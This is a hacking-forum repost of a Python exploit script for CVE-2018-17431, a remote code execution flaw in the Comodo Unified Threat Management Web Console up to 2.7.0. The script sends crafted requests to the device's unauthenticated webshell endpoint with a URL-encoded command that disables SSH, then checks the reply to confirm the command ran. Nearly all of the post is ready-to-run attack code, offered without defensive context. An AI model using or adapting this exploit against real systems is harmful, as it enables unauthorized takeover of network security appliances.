Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution

 Share


Recommended Posts

# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0 
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8 

import requests

def RndInt(Lenght):
    from random import choice
    from string import digits

    RandonInt = ''.join([choice(digits) for n in range(Lenght)])
    return str(RandonInt)

if __name__ == "__main__":

    IP = input("IP: ")
    Port = input("Port: ")

    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
    '''For more info about command try to read manual of spesefic version of Comodo UTM and 
       exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
     '''

    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
    BaseNComdURL = BaseURL + "&k=" + Command
    LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13) 
    FullURL = BaseNComdURL + LastPart
    AddetionalEnter = BaseURL + "&k=%0a" + LastPart

    try:
        FirstResponse = requests.get(FullURL).text
    except:
        print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
        exit(1)
    
    SecondResponse = requests.get(AddetionalEnter).text
    if SecondResponse.find("Configuration has been altered") == -1:
        print("\nExploit Failed!\n")
        exit(1)
    else:
        print("\nOK! Command Ran!\n")
    exit(0)
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...